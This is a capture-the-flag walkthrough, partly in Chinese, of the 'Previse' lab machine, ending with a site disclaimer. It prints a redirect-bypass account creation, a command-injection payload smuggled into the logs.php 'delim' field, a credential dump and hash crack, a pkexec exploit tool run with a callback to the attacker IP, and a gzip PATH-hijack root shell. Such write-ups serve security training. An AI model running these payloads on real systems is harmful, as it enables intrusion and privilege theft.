Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.104 | TCP:22,80 |
$ ip='10.10.11.104'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53ed4440116e8bda698579c081f23a12 (RSA)
| 256 bc5420ac1723bb5020f4e16e620f01b5 (ECDSA)
|_ 256 33c189ea5973b1788438a421100c91d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-title: Previse Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
EAR && Php files analysis RCE
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图](https://img.4awl.net/img/0d/740a06cc2690754ea6f28605f25e57.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图")
$ feroxbuster -u 'http://10.10.11.104' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图1](https://img.4awl.net/img/17/e25a5005d4be73681e88f106685531.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图1")
http://10.10.11.104/nav.php
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图2](https://img.4awl.net/img/24/32a01371cca68a0b0bfbab773454cd.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图2")
删除相应包中Location: login.php。
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图3](https://img.4awl.net/img/3e/fe8e374c01c918a28b5d1625c47a26.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图3")
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图4](https://img.4awl.net/img/5d/b769da0f48c5b098ef62ca4d8e44fc.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图4")
POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/accounts.php
Cookie: PHPSESSID=a68gg2tk2nehln8jm9bvie7q99
Upgrade-Insecure-Requests: 1
username=maptnh&password=maptnh&confirm=maptnh&submit=
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图5](https://img.4awl.net/img/8b/2e62bd664caa75533200eb094aab64.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图5")
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图6](https://img.4awl.net/img/22/ecf8db98c0ae684b06174af512a550.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图6")
http://10.10.11.104/download.php?file=32
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图7](https://img.4awl.net/img/46/8de104403d9a7efb7c00804790fe66.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图7")
$ unzip siteBackup.zip
logs.php
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图8](https://img.4awl.net/img/99/2c95f3d8536ff6e401e825a96bc9bf.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图8")
用户名:m4lwhere
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图9](https://img.4awl.net/img/da/92d32a23fd838bd9d26546d0a88769.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图9")
$ cat config.php
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图10](https://img.4awl.net/img/f4/b59bfe45001401294eb618c712507a.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图10")
username:rootpassword:mySQL_p@ssw0rd!:)
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.11.104/nav.php
Cookie: PHPSESSID=a68gg2tk2nehln8jm9bvie7q99
Upgrade-Insecure-Requests: 1
Content-Length: 30
delim=;ping -c 1 10.10.16.28
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图11](https://img.4awl.net/img/14/bd32fa12debcb97f3659616bfa663a.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图11")
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图12](https://img.4awl.net/img/6c/18b54fd9d033340d40880e987f3661.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图12")
User.txt
62f7407560ca5d003a6fd3a917ec8bdf
Lateral Movement
$ mysql -u root -p'mySQL_p@ssw0rd!:)'
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图13](https://img.4awl.net/img/4b/fc09ef1ee6886297ecbfc44df69441.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图13")
mysql> select * from accounts;
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图14](https://img.4awl.net/img/19/d4b55f52bcc6fa9d8bf2c2e3479017.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图14")
不能在这里直接复制...需要在accounts.php寻找可复制的盐
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图15](https://img.4awl.net/img/e8/82719fca365df3865432c903f3ef47.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图15")
$1$xxxllol$DQpmdvnb7EeuO6UaqRItf.
$ john hash --wordlist=/home/maptnh/Desktop/rockyou.txt --format=md5crypt-long
password:ilovecody112235!
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图16](https://img.4awl.net/img/18/88f3611aa5a5dff31d966354b36d61.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图16")
Privilege Escalation:TRP00F && Gzip Path Hijack
TRP00F
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999
[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图17](https://img.4awl.net/img/ac/9ec1be6bbf613121dd664fe886a978.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图17")
Gzip Path Hijack
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图18](https://img.4awl.net/img/d3/bbf077b25e8ec43e3b3d7737cb492e.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图18")
$ export PATH=/tmp:$PATH$ echo -e '#!/bin/bash\n/bin/bash'>/tmp/gzip$ chmod +x /tmp/gzip$ sudo /opt/scripts/access_backup.sh
![[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图19](https://img.4awl.net/img/f9/a272151f0b83b87a56eb89fd52abfa.jpg "[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…插图19")
Root.txt
440aff1f3d4da77970e98a9dc5257cfd
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
